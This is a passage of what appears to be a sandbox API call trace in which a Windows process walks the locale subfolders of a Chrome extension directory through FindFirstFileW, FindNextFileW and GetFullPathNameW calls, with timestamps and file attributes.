FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.836] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar", cAlternateFileName="")) returned 1 [0207.836] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0207.836] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0207.836] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0207.837] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0207.837] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0207.837] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0207.837] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en_GB", cAlternateFileName="")) returned 1 [0207.837] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en_US", cAlternateFileName="")) returned 1 [0207.837] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0207.837] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es_419", cAlternateFileName="")) returned 1 [0207.837] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0207.838] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0207.838] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fil", cAlternateFileName="")) returned 1 [0207.838] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0207.838] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0207.838] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0207.838] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0207.838] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0207.838] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0207.839] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0207.839] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0207.839] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0207.839] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0207.839] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ms", cAlternateFileName="")) returned 1 [0207.839] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0207.839] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0207.839] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0207.840] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0207.840] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0207.840] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0207.840] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0207.840] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0207.840] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0207.840] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr", cAlternateFileName="")) returned 1 [0207.840] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0207.841] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0207.841] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0207.841] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0207.841] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0207.842] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0207.842] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0207.842] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0207.842] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0207.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea5c) returned 1 [0207.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea68) returned 1 [0207.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0207.843] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", lpFilePart=0x0) returned 0x89 [0207.843] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\", lpFilePart=0x0) returned 0x8a [0207.843] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, 